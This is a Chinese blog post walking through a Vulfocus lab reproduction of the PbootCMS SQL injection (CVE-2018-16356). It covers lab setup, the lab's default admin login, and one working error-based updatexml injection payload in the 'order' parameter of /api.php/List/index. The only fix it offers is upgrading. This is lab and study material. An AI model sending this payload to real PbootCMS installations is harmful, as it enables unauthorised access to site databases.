[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)

最新推荐文章于 2024-05-21 16:06:31 发布
最新推荐文章于 2024-05-21 16:06:31 发布
阅读量7.2k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/122455984
版权

简介

PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/

靶场搭建

使用在线靶场http://vulfocus.fofa.so
在这里插入图片描述
进入环境,发现需要获取授权码
在这里插入图片描述
https://www.pbootcms.com/freesn/
进入网站,输入域名获取授权码
在这里插入图片描述
然后进入网站后台
后台路径:/admin.php 用户名密码:admin:123456
在这里插入图片描述
在这里插入图片描述
输入域名授权码并提交

在这里插入图片描述
将API启用
在这里插入图片描述
再次访问网站,已经可以正常访问了
在这里插入图片描述

漏洞复现

构造payload

/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20md5(1954))),1))%20%23

在这里插入图片描述
payload中的md5(1954)被执行,证明漏洞存在。

修复

升级为最新版本

00勇士王子
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PbootCMS 前台RCE漏洞复现
0xSec
12-07 3115
PbootCMS v
pbootcms SQL注入CVE-2018-16356)
m0_65150886的博客
01-03 670
PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。后台路径:/admin.php 用户名密码:admin:123456。1.访问ip:port,进入环境,发现需要获取授权码。用户名密码:admin:123456。6.再次访问网站,已经可以正常访问了。2.进入网站,输入域名获取授权码。后台路径:/admin.php。7.构造payload。
PbootCMS search SQL注入漏洞
孤桜懶契
07-13 4677
搜索框页面为 ✅ Payload为 https://gylq.gitee.io/time/
Goby 漏洞发布|PBOOTCMS /tag/index 代码执行漏洞
最新发布
m0_46699477的博客
05-21 328
PbootCMS 是全新内核且永久开源免费的 PHP 企业网站开发建设管理系统,是一套高效、简洁、强悍的可免费商用的 PHP CMS 源码,能够满足各类企业网站开发建设的需要。攻击者可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个 web 服务器。
PbootCMS SQL注入漏洞
自强不息
10-06 866
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PbootCMS v3.0.5 升级提示 执行SQL发生错误:duplicate column name: picstitle
wuzhiqiang6891的专栏
12-09 983
升级后提示升级提示:执行SQL发生错误!错误:duplicate column name: picstitle这个问题主要出现在PbootCMS v3.0.5及以下版本升级后可能出现。原因是因为 PbootCMS v3.0.6 版本追加了几个新字段,升级过程中 sql 语句未执行
【漏洞复现-django-SQL注入vulfocus/django-cve_2022_28346
10-12 1701
【django-SQL注入】可控参数注入
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
【漏洞复现-django-SQL注入vulfocus/django-cve_2019_14234
10-12 1236
【django-SQL注入】参数注入
保护你的网站:pbootcms漏洞修复详解
奇妙的Bug之旅
01-14 1689
通过升级pbootcms版本、修复已知漏洞、加强用户认证、输入验证和过滤以及安全的数据库操作,我们可以大大提高pbootcms系统的安全性。然而,安全是一个动态过程,我们应该时刻保持警惕并跟踪最新的安全漏洞和修复方法。同时,我们还应该过滤用户输入,以删除潜在的恶意代码。首先,我们需要确保我们使用的pbootcms版本是最新的。漏洞通常是通过已知的软件漏洞进行攻击的。因此,通过升级到最新版本,我们可以避免已知漏洞的风险。数据库操作是一个网站的核心功能,同时也是最容易受到注入攻击的地方之一。
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 535
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
PbootCMS 百度收录劫持跳转【js劫持】
刘登辉的博客
10-24 355
发下被劫持后就开始排查php代码,最后排查一个多小时没有用,找不到,因为之前index.php中过类似的劫持病毒,后来改了权限,恢复了源文件,现在找不到,没办法只能把数据库文件,配置文件备份,然后从官网下载最新版,把配置信息以及相关文件移动过去。找到用到的js文件,二分法排除,每次上传完一半之后就新开隐私模式重新搜索关键字,如果跳转,就再次二分排查,最后找到了: jquery.min.js 这个文件。网站用了开源免费的PbootCMS ,用了一段时间之后百度收录了网站,记录挺多的。
代码审计-2 SQL注入
xhscxj的博客
11-30 1032
在。
PbootCMS漏洞揭秘:绕过登录检查获取管理员权限“
奇妙的Bug之旅
01-14 2614
PbootCMS是一款基于PHP开发的内容管理系统,提供了丰富的功能和模块,但也存在一些安全漏洞。本文将介绍并详细分析PbootCMS中的一个漏洞,同时提供一个完整的实例来展示漏洞的利用过程。本文详细介绍了PbootCMS中的一个漏洞,并提供了一个完整的实例来展示漏洞的利用过程。通过了解漏洞的原理和修复方法,我们可以更好地加强系统的安全性,保护网站和用户的信息安全。
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
m0_46699477的博客
04-01 5579
PbootCMSPbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。
CVE-2018-8034
07-28
CVE-2018-8034是一个与Apache Tomcat相关的漏洞。根据提供的引用内容,我无法找到与CVE-2018-8034直接相关的信息。请提供更多关于CVE-2018-8034的信息,以便我能够为您提供准确的答案。 #### 引用[.reference_title] - *1* [windows Server 2012 R2扫描漏洞处理(CVE-2018-0886,CVE-2016-2183,CVE-2013-2566,CVE-2015-2808)](https://blog.csdn.net/weixin_39945506/article/details/119863457)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [常见主机漏洞](https://blog.csdn.net/weixin_45849370/article/details/102956932)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值